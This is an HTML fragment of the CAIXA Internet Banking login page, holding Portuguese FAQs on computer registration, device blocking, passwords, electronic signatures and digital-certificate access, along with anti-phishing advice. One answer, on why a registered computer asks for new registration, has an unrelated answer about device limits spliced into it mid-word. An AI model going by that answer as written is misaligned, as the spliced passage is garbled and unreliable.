                                    <td class="fontBold">Acesso</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Computador 01</td>
                                    <td>15/04/2012</td>
                                    <td rowspan="4">Computador 05</td>
                                    <td rowspan="4">01/09/2012</td>
                                    <td>Computador 01</td>
                                    <td>15/04/2012</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Computador 02</td>
                                    <td>22/08/2012</td>
                                    <td>Computador 03</td>
                                    <td>22/08/2012</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Computador 03</td>
                                    <td>22/08/2012</td>
                                    <td>Computador 04</td>
                                    <td>30/08/2012</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Computador 04</td>
                                    <td>30/08/2012</td>
                                    <td>Computador 05</td>
                                    <td>01/09/2012</td>
                                </tr>
                            </tbody>
                        </table>
                        <br>
                        <p class="subTitleModal">6. Como saber quantos computadores já cadastrei?
                        </p>
                        <p>Na página principal do Banking você verá um quadro com as informações de todos seus
                            computadores Cadastrados para serem
                            utilizados, totalizando 4 computadores por usuário. Caso queira ver a lista completa, você
                            poderá acessar o link "ver
                            todos" ou ainda acessar Gerenciar - computadores, que se encontra do lado esquerdo da página
                            principal do Internet
                            Banking.
                        </p>
                        <p class="subTitleModal">7. O que posso fazer depois que eu cadastrar um computador para acessar
                            o Internet Banking CAIXA?</p>
                        <p>Você poderá acessar todas as informações sobre produtos e suas contas, além de utilizar todos
                            os serviços fornecidos
                            pelo Internet Banking, com adicionais de segurança.</p>
                        <p class="subTitleModal">8. Meu computador estava cadastrado e agora está me pedindo novo
                            cadastramento. O que aconteceu?</p>
                        <p>O mais comum é que o prazo determinado no momento do cadastramento tenha expirado. Mas pode
                            ser que tenha ocorrido
                            alguma alteração no hardware de seu computador, como mudança dQuantos você desejar. Porém,
                            somente quatro equipamentos
                            poderão constar como Cadastrados para serem usados. No caso de você cadastrar um quinto
                            equipamento, aquele que possuir
                            o acesso mais antigo da lista dos "cadastrados" assumirá a situação de inativo e dará lugar
                            ao seu novo equipamento.e
                            placa-mãe, expansão de memória etc.
                        </p>
                        <p class="titleModalKnowMore">Sobre o gerenciamento dos computadores cadastrados</p>
                        <br>
                        <p class="subTitleModal">1. Como faço para gerenciar meus computadores cadastrados?</p>
                        <p>Você poderá ter acesso á todas as informações sobre os cadastramentos realizados, clicando na
                            opção "Gerenciar Computadores",
                            que se encontra no lado esquerdo da página principal do Internet Banking CAIXA.</p>
                        <p class="subTitleModal">2. Quais as informações contidas na página "Gerenciar Computadores"?
                        </p>
                        <p>É uma página que possui a lista completa de todos os computadores já cadastrados, contendo
                            apelido, data de cadastramento,
                            data de expiração e situação.</p>
                        <p class="subTitleModal">3. Quais as situações que poderão ser apresentadas para cada
                            equipamento?</p>
                        <p>
                            Cada equipamento apresentado possuirá um tipo de situação conforme o caso:<br> <br> - <b>Em
                                uso</b> - equipamento
                            registrado e sendo utilizado naquele momento pelo usuário (virá realçado dos demais)
                            <br> <br> - <b>Cadastrado</b> - equipamento registrado e dentro do prazo de validade
                            escolhido pelo usuário no momento
                            do cadastramento.<br> <br> - <b>Inativo</b> - equipamento registrado, porém com o prazo
                            expirado.<br> <br> - <b>Bloqueado</b> - equipamento registrado e bloqueado pelo usuário.
                        </p>
                        <p class="subTitleModal">4. Posso excluir da lista algum computador que cadastrei?</p>
                        <p>Não. Os computadores cadastrados serão excluídos da lista de modo automático, 3 meses após
                            assumirem a situação de
                            "Inativo" ou "Bloqueado".
                        </p>
                        <p class="subTitleModal">5. Quando um equipamento poderá ser bloqueado?
                        </p>
                        <p>Existem duas maneiras de se bloquear um equipamento: por decisão do usuário ou, de modo
                            involuntário, por digitação
                            equivocada de seus dados pessoais.</p>
                        <p class="subTitleModal">6. O que faço para bloquear um equipamento?
                        </p>
                        <p>É muito simples. Basta acessar sua lista de máquinas pelo link "Ver todos" ou "Gerenciar
                            computadores" e marcar o equipamento
                            que deseja bloquear.</p>
                        <p class="subTitleModal">7. Como faço para desbloquear um computador?
                        </p>
                        <p>O desbloqueio de qualquer equipamento só poderá ser realizado por meio do telefone 0800 726
                            0104 ou numa agência da
                            CAIXA Ao desbloquear um equipamento, ele assume a situação de "Inativo", precisando ser
                            cadastrado novamente.</p>
                        <p class="subTitleModal">8. Posso reativar um equipamento já cadastrado?
                        </p>
                        <p>Sim. Se ele possuir a situação de Inativo, basta acessar o equipamento e cadastrá-lo
                            novamente.</p>
                        <p class="subTitleModal">9. O que acontece com aqueles equipamentos em que eu cadastrei para um
                            único acesso?</p>
                        <p>Ele continuará em sua lista de computadores cadastrados, porém com a situação de "Inativo".
                        </p>
                        <p class="titleModalKnowMore">Utilização de um equipamento por vários usuários.</p>
                        <br>
                        <p class="subTitleModal">1. Na minha casa há três pessoas que utilizam o Internet Banking CAIXA.
                            Como fica o cadastramento?</p>
                        <p>Para cada CPF, o equipamento terá um apelido. Assim, se três pessoas acessam o mesmo
                            equipamento, quando acessá-lo
                            pela primeira vez, cada uma escolherá um apelido e o prazo de duração do cadastramento para
                            aquele equipamento.</p>
                        <p class="subTitleModal">2. Eu não quero me cadastrar. O que eu faço?
                        </p>
                        <p>Para garantir o adicional de segurança, a CAIXA só permitirá o acesso ao Banking para os
                            equipamentos que possuam as
                            configurações já descritas e que estejam cadastrados.</p>
                        <p class="subTitleModal">3. Meu computador não possui as configurações exigidas pela CAIXA, mas
                            eu quero cadastrá-las mesmo assim. É possível?</p>
                        <p>Não. A CAIXA só irá cadastrar aqueles computadores cujas configurações sejam as já descritas
                            para o processo. Em breve
                            a CAIXA colocará o Cadastramento de Computadores á disposição de todos os seus usuários,
                            independente da configuração
                            dos equipamentos utilizados.</p>
                        <table>
                            <tbody>
                                <tr class="trBlueDark">
                                    <th class="textStyle">Sistemas Operacionais</th>
                                    <th class="textStyle">Internet Explorer x86 (Versão)</th>
                                    <th class="textStyle">Mozilla Firefox (Versão)</th>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Windows 2000</td>
                                    <td>5.5 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Windows 2003</td>
                                    <td>6.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Windows 2003 Server</td>
                                    <td>6.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Windows XP SP3</td>
                                    <td>6.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Windows XP 64 SP3</td>
                                    <td>6.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Windows Vista 32</td>
                                    <td>7.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Windows Vista 64</td>
                                    <td>7.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueLight">
                                    <td>Windows 7 32</td>
                                    <td>8.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                                <tr class="trBlueClean">
                                    <td>Windows 7 64</td>
                                    <td>8.0 ou superior</td>
                                    <td>3.6 ou superior</td>
                                </tr>
                            </tbody>
                        </table>
                        <br>
                        <p class="subTitleModal">4. Fui utilizar o meu computador e recebi um aviso que "Não foi
                            possível acessar o Banking deste computador." O que
                            eu faço?</p>
                        <p>Ligue imediatamente para 0800 726 0104 e informe o código que aparece na mensagem. É rápido e
                            você poderá fazê-lo 24
                            horas por dia, sete dias na semana.</p>
                        <p class="subTitleModal">5. Tenho conta conjunta e só utilizo equipamentos passíveis de
                            cadstramento. O que acontece se o outro titular quiser
                            acessar de um computador sem as configurações exigidas?
                        </p>
                        <p>O cadastramento é realizado por CPF. Assim, os dois terão acessos individuais diferenciáveis.
                            No entanto, a conta poderá
                            ser acessada de duas maneiras: com a segurança usual do Internet Banking CAIXA e com o
                            Adicional de Segurança - Cadastramento
                            de Computadores. A CAIXA recomenda que todos os acessos sejam realizados somente de
                            computadores que possam ser cadastrados.
                            Caso isso seja impossível, reforce as ações de segurança com a utilização de antivírus
                            atualizados e firewall.</p>
                        <p class="subTitleModal">6. Se eu viajar, o que faço para acessar minha conta pela Internet?</p>
                        <p>Se você ainda não estiver cadastrado no Internet Banking, antes de viajar, cadastre-se para
                            obter acesso, definindo
                            um Usuário e Senha Internet, a partir de sua senha de quatro dígitos. Caso deseje, além de
                            consultar, efetuar pagamentos/transferências
                            via internet, solicite ao seu gerente a Assinatura Eletrônica.</p>
                        <p class="subTitleModal">7. Qual o procedimento para o cadastramento em caso de viagem?</p>
                        <p>Ao acessar o Internet Banking durante a viagem, caso o computador que você esteja utilizando
                            permita o Adicional de
                            Segurança, será exigido que você efetue o cadastramento do computador. Nesse caso, selecione
                            a opção "Apenas para
                            esse acesso" ou, caso você conheça a procedência do computador e das rotinas de segurança
                            utilizada (casa de familiares,
                            amigos), defina um número de dias, se preferir. Evite ao máximo o uso de computadores em
                            locais públicos. Sempre que
                            possível, agende seus pagamentos pelo Internet Banking.</p>
                        <p class="subTitleModal">8. Poderei cadastrar computadores localizados no exterior?</p>
                        <p>Sim. Caso você esteja fora do Brasil poderá fazer o cadastramento dos computadores durante o
                            acesso ao Internet Banking
                            CAIXA. Caso necessite sanar dúvidas ou de ajuda no exterior, entre em contato com o
                            Help-desk CAIXA com chamada a
                            cobrar para o número 55 71 3206 9900 e informe tratar-se de cadastramento de computadores no
                            Internet Banking CAIXA.</p>
                        <p class="titleModalKnowMore">Outras Informações sobre o produto</p>
                        <p>
                            - A CAIXA não enviará e-mails solicitando quaisquer tipos de informações para o cliente.
                            Seja de seu computador ou de sua(s)
                            conta(s), como usuário e senhas. <br> <br> - O Internet Banking CAIXA não envia e-mails com
                            links. <br> <br> - Na dúvida de estar numa página segura da CAIXA, verifique se há um
                            pequeno cadeado do lado direito do rodapé da
                            página do Internet Banking. Clique duas vezes para abrir o "Certificado" e verificar para
                            quem foi emitido. Verifique
                            também, clicando na aba "Caminho de certificação". <br> <br> - Em caso de suspeita, ligue
                            para o Suporte CAIXA, por
                            meio do telefone 0800 726 0104. <br>
                            <br> - Aprenda mais sobre segurança, clicando <a href="http://www.caixa.gov.br/"
                                target="_blank">aqui</a>. <br>
                            <br> - Procure utilizar o Internet Banking CAIXA a partir de computadores conhecidos.
                        </p>
                        <p>
                            <a href="#topo1">topo</a>
                        </p>
                    </section>
                </article>
            </div>

            <!-- CONTENT MODAL FAQS -->
            <div id="openFaq" class="knowMore | knowMorelogin ui-draggable">
                <article id="knowMoreModal3" class="knowMoreContent">
                    <a id="topo2"></a>
                    <div class="btClose" data-divhide="#openFaq">
                        <button class="buttonBlue" style="border-radius: 3px;">
                            <span>Fechar</span>
                        </button>
                    </div>
                    <section id="contentKnowMoreFaq" class="tabContent">
                        <p class="titleModal">Perguntas frequentes</p>
                        <nav>
                            <ul>
                                <li><a href="#sm_1_1"> 1.1 O que devo fazer para acessar
                                        o Internet Banking?</a></li>
                                <li><a href="#sm_1_2"> 1.2 O que é criar um Usuário?</a></li>
                                <li><a href="#sm_2_1"> 2.1 Como ocorre o acesso a uma
                                        conta conjunta?</a></li>
                                <li><a href="#sm_2_2"> 2.2 Preciso logar novamente para
                                        acessar uma conta com perfil PJ, estando em uma conta com perfil
                                        PF e vice versa?</a></li>
                                <li><a href="#sm_3_1"> 3.1 "Minhas Transações" é uma
                                        consulta das transações efetivadas?</a></li>
                                <li><a href="#sm_3_2"> 3.2 Para que serve "Minhas
                                        Transações"?</a></li>
                                <li><a href="#sm_3_3"> 3.3 Para que serve o "AVISO"?</a></li>
                                <li><a href="#sm_3_4"> 3.4 Para que serve o "Calendário"?</a></li>
                                <li><a href="#sm_4_1"> 4.1 Qual a diferença entre Senha
                                        Internet e Assinatura Eletrônica ?</a></li>
                                <li><a href="#sm_4_2"> 4.2 Qual a diferença entre
                                        Assinatura Eletrônica simples e Assinatura Eletrônica Múltipla?</a></li>
                                <li><a href="#sm_4_3"> 4.3 O que faço se eu esquecer ou
                                        bloquear minha Senha Internet?</a></li>
                                <li><a href="#sm_4_4"> 4.4 Se eu esquecer ou bloquear a
                                        Assinatura Eletrônica, posso cadastrar outra ou efetuar o
                                        desbloqueio?</a></li>
                                <li><a href="#sm_4_5"> 4.5 Como o usuário pode vir a
                                        bloquear sua Assinatura Eletrônica?</a></li>
                                <li><a href="#sm_4_6"> 4.6 Para alterar a Senha Internet
                                        ou a Assinatura Eletrônica, é preciso ir á agência?</a></li>
                                <li><a href="#sm_4_7"> 4.7 O nome atribuído ao Usuário
                                        pode ser alterado?</a></li>
                                <li><a href="#sm_4_8"> 4.8 A alteração do nome do Usuário
                                        implica na perda de todas as informações e dados já cadastrados?</a></li>
                                <li><a href="#sm_5_1"> 5.1 Como fica o acesso ao
                                        GovConta?</a></li>
                                <li><a href="#sm_6_1"> 6.1 O que é?</a></li>
                                <li><a href="#sm_6_2"> 6.2 Como funciona?</a></li>
                                <li><a href="#sm_6_3"> 6.3 Quem precisa cadastrar?</a></li>
                                <li><a href="#sm_6_4"> 6.4 Onde posso encontrar
                                        informações adicionais sobre o cadastramento de computador?</a></li>
                                <li><a href="#sm_7"> 7. Fique atento</a></li>
                            </ul>
                        </nav>
                        <br> <br>
                        <p class="titleModalKnowMore">1. Sobre Adesão</p>
                        <p class="subTitleModal" id="sm_1_1">1.1 O que devo fazer para acessar o Internet Banking?</p>
                        <p>
                            O acesso ao Internet Banking é feito através de Usuário e Senha Internet.
                            <br> Para o primeiro acesso, deve-se fazer o cadastramento da seguinte forma: <br> - Clique
                            no botão Cadastre-se;
                            <br> - Preencha todos os campos da página de Dados Pessoais e selecione Continuar;<br> - Na
                            próxima tela preencha
                            os campos com os dados da conta e tecle em Continuar;<br> - Em seguida cadastre um Usuário e
                            a Senha Internet;<br> - Na tela seguinte leia o Termo de Adesão, preencha os campos
                            solicitados e tecle em Continuar. Recomenda-se a impressão
                            do Termo;<br> - Na próxima tela as informações são apresentadas para confirmação, caso
                            precisem ser alteradas selecione
                            Retornar, faça os ajustes necessários e confirme;<br> <a href="#topo2">topo</a><br>
                        </p>
                        <p class="subTitleModal" id="sm_1_2">1.2 O que é criar um Usuário?
                        </p>
                        <p>
                            É definir uma chave de login para acesso ao Internet Banking proporcionando maior segurança.
                            Quem define o Usuário é o titular
                            Pessoa Física (001 ou 013) ou o representante de Pessoa Jurídica (003) / Governo (006).<br>
                            <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore">2. Sobre Acesso</p>
                        <p class="subTitleModal" id="sm_2_1">2.1 Como ocorre o acesso a uma conta conjunta?</p>
                        <p>
                            Cada CPF tem um Usuário e Senha Internet diferentes para essa mesma conta. <a
                                href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_2_2">2.2 Preciso logar novamente para acessar uma conta 003,
                            estando em uma conta 001 e vice versa?</p>
                        <p>
                            Não, desde que as duas contas estejam cadastradas no mesmo Usuário. O cadastramento de
                            contas vinculadas ao CPF do titular
                            se dá por meio do menu GERENCIAR, CONTAS, na página inicial, após o login. <br>
                            <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore">3. Sobre Relacionamento</p>
                        <p class="subTitleModal" id="sm_3_1">3.1 "Minhas Transações" é uma consulta das transações
                            efetivadas?</p>
                        <p>
                            Não. A opção Minhas Transações é um serviço onde o cliente poderá cadastrar os dados de
                            pagamentos e transferências, podendo
                            utilizar essas informações sempre que precisar, sem necessitar de digitá-los novamente. Para
                            visualizar as transações
                            efetivadas, deve-se utilizar o menu Consultas. <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_3_2">3.2 Para que serve "Minhas Transações"?
                        </p>
                        <p>
                            Facilitar para o cliente a utilização de transações com dados repetitivos. <br> <a
                                href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_3_3">3.3 Para que serve o "AVISO"?
                        </p>
                        <p>
                            É uma área que não é fixa e serve para exibir mensagens importantes ao cliente.<br> <a
                                href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_3_4">3.4 Para que serve o "Calendário"?
                        </p>
                        <p>
                            Divulgar eventos, compromissos, datas comemorativas importantes, etc.
                            <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore">4. Sobre Senha</p>
                        <p class="subTitleModal" id="sm_4_1">4.1 Qual a diferença entre Senha Internet e Assinatura
                            Eletrônica?</p>
                        <p>
                            A Senha Internet é cadastrada pelo próprio cliente na página de login do Internet Banking e
                            é utilizada somente para acessar
                            o Internet Banking e em operações de consulta. É uma senha composta de 6 (PF)a 8 (PJ)
                            dígitos alfa numéricos.<br> <br>Já a Assinatura Eletrônica tem que ser cadastrada
                            inicialmente na agência e serve para a realização de movimentações
                            financeiras.
                            <br>
                            <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_2">4.2 Qual a diferença entre Assinatura Eletrônica simples e
                            Assinatura Eletrônica Múltipla?</p>
                        <p>
                            A assinatura eletrônica simples é composta de 6 dígitos numéricos e atende as contas de
                            Pessoa Física individual ou conjunta
                            solidária e conta de Pessoa Jurídica com apenas um único representante.<br>
                            <br>A assinatura eletrônica múltipla é composta de de 6 a 8 dígitos alfanuméricos e atende
                            as contas de Pessoa Física
                            conjunta não solidária e conta de Pessoa Jurídica com mais de um representante.
                            <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_3">4.3 O que faço se eu esquecer ou bloquear minha Senha
                            Internet?</p>
                        <p>
                            Faça um novo cadastramento, podendo ou não utilizar o mesmo nome de Usuário.
                            <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_4">4.4 Se eu esquecer ou bloquear a Assinatura Eletrônica,
                            posso cadastrar outra ou efetuar o desbloqueio?</p>
                        <p>
                            Sim, tanto o cadastramento quanto o desbloqueio da Assinatura Eletrônica podem ser
                            realizados na agência onde o cliente tem
                            a conta ou em um terminal de autoatendimento. <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_5">4.5 Como o usuário pode vir a bloquear sua Assinatura
                            Eletrônica?</p>
                        <p>
                            O bloqueio da Assinatura eletrônica acontece pela ocorrência de 3 tentativas consecutivas,
                            quando o usuário a informa incorretamente.
                            Neste caso, se o usuário já tiver informado, por exemplo, dentro do mês duas vezes a senha
                            incorretamente, na próxima
                            a mesma será bloqueada, ou seja, a tentativa não é no mesmo dia, mas cumulativa no tempo.
                            Após bloqueada, poderá ser
                            liberada na agência ou terminal de autoatendimento.<br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_6">4.6 Para alterar a Senha Internet ou a Assinatura
                            Eletrônica, é preciso ir á agência?</p>
                        <p>
                            Não. Sempre após o login, a alteração da Senha Internet é feita na opção Gerenciar Acesso
                            (localizada na barra superior direita
                            da tela do Internet Banking, á direita do saldo) Senhas Alterar Senha Internet (parte
                            inferior direita da tela, abaixo
                            da lista de contas). <br> <br>A Assinatura Eletrônica, após ter sido gerada na agência, deve
                            ser alterada no
                            prazo de 15 dias corridos no item Gerenciar - Contas. Isso ocorre na abertura da conta,
                            quando o gerente disponibiliza
                            a Assinatura eletrônica inicial e quando há o bloqueio da mesma.<br> <a
                                href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_7">4.7 O nome atribuído ao Usuário pode ser alterado?</p>
                        <p>
                            Sim, através da opção Gerenciar Acesso (localizada na barra superior direita da tela do
                            Internet Banking, á direita do saldo)
                            Senhas Alterar Usuário (último botão da parte inferior direita da tela, abaixo da lista de
                            contas).<br>
                            <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_4_8">4.8 A alteração do nome do Usuário implica na perda de
                            todas as informações e dados já cadastrados?
                        </p>
                        <p>
                            Não, apenas a(s) conta(s) deverá(ão) ser cadastrada(s) novamente. As demais informações e
                            dados serão preservadas, pois estão
                            vinculados ao CPF do cliente.<br> <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore">5. Sobre Conta de Governo</p>
                        <p class="subTitleModal" id="sm_5_1">5.1 Como fica o acesso ao GovConta?
                        </p>
                        <p>
                            Neste momento, o acesso ao GovConta continua o mesmo.<br> <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore">6. Sobre Cadastro de computador</p>
                        <p class="subTitleModal" id="sm_6_1">6.1 O que é?</p>
                        <p>
                            É uma ferramenta para que os usuários do Internet Banking CAIXA acessem sua conta e serviços
                            com adicionais de segurança.
                            O cadastramento do computador visa proteger seu patrimônio, evitando que pessoas
                            inescrupulosas o façam. <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_6_2">6.2 Como funciona?</p>
                        <p>
                            O cadastro do computador será automaticamente requerido durante o primeiro acesso ao
                            Internet Banking, ou quando ele for
                            acessá-lo de um novo computador ainda não cadastrado,; após entrar no Internet Banking
                            Caixa, o usuário será levado
                            a cadastrar aquele computador que ele está utilizando, escolhendo um apelido para o
                            equipamento (ex: ComputadorX)
                            e o tempo que deseja mantê-lo cadastrado, que poderá ser para um único acesso, por dias (até
                            365) ou por tempo indeterminado.
                            Uma vez cadastrado o computador, você estará pronto para utilizar o Banking com uma
                            segurança adicional, além daquelas
                            já existentes para todos os usuários. <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_6_3">6.3 Quem precisa cadastrar?</p>
                        <p>
                            Todo usuário que esteja acessando o Internet Banking CAIXA de um computador que utiliza o
                            sistema operacional Windows com
                            navegadores Internet Explorer ou Firefox. O próprio Internet Banking CAIXA verificará de
                            modo automático e apresentará
                            as telas para o cadastramento. Caso seja necessário, o Banking fará a instalação da
                            ferramenta que permitirá o cadastramento
                            do computador, o que ocorre em alguns segundos, permitindo ao usuário realizar suas
                            consultas e transações bancárias
                            com segurança. <br>
                            <a href="#topo2">topo</a>
                        </p>
                        <p class="subTitleModal" id="sm_6_4">6.4 Onde posso encontrar informações adicionais sobre o
                            cadastramento de computador?</p>
                        <p>
                            No botão "CADASTRO DE COMPUTADOR" no canto direito da tela inicial de acesso ao Internet
                            Banking CAIXA. <br> <a href="#topo2">topo</a>
                        </p>
                        <p class="titleModalKnowMore" id="sm_7">7. Fique atento:</p>
                        <p>
                            A CAIXA <b>não enviará</b> e-mails solicitando quaisquer tipos de informações para o
                            cliente. Seja de seu computador
                            ou de sua(s) conta(s), como usuário e senhas.
                        </p>
                        <p>
                            O Internet Banking CAIXA <b>não envia</b> e-mails com links.
                        </p>
                        <p>Na dúvida de estar numa página segura da CAIXA, verifique se há um pequeno cadeado do lado
                            direito do rodapé da página
                            do Internet Banking. Clique duas vezes para abrir o "Certificado" e verificar para quem foi
                            emitido. Verifique também,
                            clicando na aba "Caminho de certificação".</p>
                        <p>
                            Em caso de suspeita, ligue para o Suporte CAIXA, por meio do telefone <b>0800 726 0104</b>.
                        </p>
                        <p>
                            O Internet Banking CAIXA <b>não envia</b> e-mails com links. <br>
                            <a href="#topo2">topo</a>
                        </p>
                    </section>
                </article>
            </div>
            <div id="certificadoBox" class="knowMore | knowMorelogin ui-draggable">
                <article id="knowMoreModal3" class="knowMoreContent">
                    <a id="topoCertificado"></a>
                    <div class="btClose" data-divhide="#certificadoBox">
                        <button class="buttonBlue pull-right" style="border-radius: 3px;">Fechar</button>
                    </div>
                    <section id="contentKnowMoreFaq" class="tabContent">
                        <p class="titleModal">Perguntas frequentes sobre o acesso com Certificado Digital ao Internet
                            Banking CAIXA</p>
                        <nav>
                            <ul>
                                <li><a href="#sm_1"> 1. O que preciso para poder usar um
                                        certificado digital no Internet Banking CAIXA?</a></li>
                                <li><a href="#sm_2"> 2. Como acessar o Internet Banking
                                        CAIXA com um certificado digital?</a></li>
                                <li><a href="#sm_3"> 3. Como fazer para que o acesso ao
                                        Internet Banking CAIXA seja possível somente com o uso de um
                                        certificado digital?</a></li>
                                <li><a href="#sm_4"> 4. Quais os benefícios do uso de um
                                        certificado digital no Internet Banking CAIXA?</a></li>
                                <li><a href="#sm_5"> 5. Quais os cuidados que devo ter ao
                                        usar o meu certificado digital no Internet Banking CAIXA?</a></li>
                                <li><a href="#sm_6"> 6. Como proceder em caso de erro ao
                                        tentar acessar o Internet Banking CAIXA com um certificado
                                        digital?</a></li>
                                <li><a href="#sm_7_C"> 7. Quais os cuidados básicos que
                                        deverão ser tomados com as senhas PIN e PUK?</a></li>
                            </ul>
                        </nav>
                        <br> <br>
                        <p class="titleModalKnowMore" id="sm_1">1. O que preciso para poder usar um certificado digital
                            no Internet Banking CAIXA?</p>
                        <p>
                            Você precisará possuir um certificado digital válido, do tipo A3, emitido por uma das
                            Autoridades Certificadoras da ICP-Brasil
                            (Infraestrutura de Chaves Públicas Brasileira). A CAIXA é a única instituição financeira
                            brasileira que é credenciada
                            como autoridade certificadora na ICP-Brasil (Clique <a
                                href="http://www.caixa.gov.br/empresa/identidade-digital/Paginas/default.aspx"
                                target="_blank">aqui</a> para mais informações sobre como obter um certificado digital
                            destes.) <br> <a href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_2">2. Como acessar o Internet Banking CAIXA com um
                            certificado digital?</p>
                        <p>
                            Se você já dispõe de um certificado e o utiliza em outros serviços, é simples: <br> - insira
                            na leitora de cartões
                            de seu computador o cartão com seu certificado (ou o token na entrada USB); <br> - abra o
                            seu navegador Internet e
                            acesse o Internet Banking CAIXA na Intranet. <br> - informe o seu usuário, selecione
                            "Acessar com certificado digital"
                            e clique no botão "Confirmar"; <br> - confirme as iniciais de seu nome; <br> - selecione o
                            certificado digital na
                            tela que será apresentada (se não aparecer opção alguma para seleção, certifique-se de que
                            seu cartão contém um certificado
                            válido e que você colocou o cartão na leitora antes mesmo de abrir o seu navegador
                            Internet). Se não aparecer, feche
                            as janelas abertas de seu navegador Internet e tente novamente; <br> - digite a sua senha
                            PIN (é a senha que você
                            escolheu quando gravou o certificado no cartão); <br> - pronto, o Internet Banking CAIXA
                            está disponível para uso.
                            <br>Atenção: Sempre que terminar de consultar o Internet Banking CAIXA, use o botão SAIR
                            para terminar sua sessão
                            com segurança.<br> <a href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_3">3. Como fazer para que o acesso ao Internet Banking
                            CAIXA seja possível somente com o uso de um certificado digital?</p>
                        <p>
                            Se você quiser garantir mais segurança para seu Internet Banking CAIXA, habilite o acesso
                            exclusivo com certificado digital,
                            no menu "Gerenciar", item "Certificado digital". Você poderá desabilitá-lo a qualquer
                            momento, acessando o Internet
                            Banking CAIXA com o certificado digital e pedindo a exclusão do acesso exclusivo.<br>
                            <a href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_4">4. Quais os benefícios do uso de um certificado digital
                            no Internet Banking CAIXA?</p>
                        <p>
                            Um certificado digital é uma ferramenta avançada de segurança, que garante a autenticidade,
                            a proteção e a validade jurídica
                            de transações realizadas na Internet. Isso só é possível para quem utiliza o certificado
                            digital. Em breve, os clientes
                            que usarem certificado digital para acessar o Internet Banking CAIXA desfrutarão de serviços
                            exclusivos e de maiores
                            limites para realização de transações financeiras nesse canal.<br> <a
                                href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_5">5. Quais os cuidados que devo ter ao usar o meu
                            certificado digital no Internet Banking CAIXA?
                        </p>
                        <p>
                            Atenção: Sempre que terminar de consultar o Internet Banking CAIXA, use o botão SAIR para
                            terminar sua sessão com segurança.<br> <a href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_6">6. Como proceder em caso de erro ao tentar acessar o
                            Internet Banking CAIXA com um certificado digital?</p>
                        <p>
                            Caso ocorra algum erro ao tentar o acesso ao Internet Banking CAIXA, feche todas as janelas
                            abertas de seu navegador Internet
                            antes de tentar novamente. Caso o problema persista, contate o Help Desk CAIXA pelo número
                            3004 1104, para capitais
                            e regiões metropolitanas, ou 0800 726 0104, para demais regiões.<br> <a
                                href="#topoCertificado">topo</a><br>
                        </p>
                        <p class="titleModalKnowMore" id="sm_7_C">7. Quais os cuidados básicos que deverão ser tomados
                            com as senhas PIN e PUK?</p>
                        <p>
                            A sua senha PIN é de seu uso e conhecimento exclusivos. É importante seguir alguns
                            procedimentos para sua segurança: <br>Mantenha
                            o sigilo da sua senha PIN e nunca a revele a terceiros; <br>Não empreste seu cartão com seu
                            certificado a terceiros;
                            <br>Ao gerar sua senha PIN, atente para que esta seja fácil de se lembrar, porém difícil de
                            ser identificada por terceiros,
                            ou seja, não utilize nomes conhecidos, datas de nascimento, CPF ou outras informações que
                            sejam passíveis de dedução;
                            <br>Memorize a sua senha PIN e não a escreva em lugar algum, nem a grave no aparelho
                            celular. <br>Caso você não se
                            recorde da sua senha PIN, ela poderá ser redefinida por meio da utilização da senha PUK (que
                            também foi cadastrada
                            por você na emissão do certificado). Vale ressaltar que os cuidados com a senha PUK são os
                            mesmos procedimentos para
                            a senha PIN.<br> <a href="#topoCertificado">topo</a><br>
                        </p>
                    </section>
                </article>
            </div>
        </div>

    </div>
</div>

<div class="rodapePrincipal hidden-xs">
    <div class="main">
        <div class="container-fluid">
            <div class="row sm-m-l-0">
                <div class="col-lg-4 col-md-4 col-sm-4 hidden-xs rodapeTelefone">
                    <div id="rodapeSuporte" class="rodapeBtEsq fonteBranca">
                        <div>Suporte Tecnológico<br>3004 1104(Capitais) ou 0800 726 0104(Demais regiões)</div>
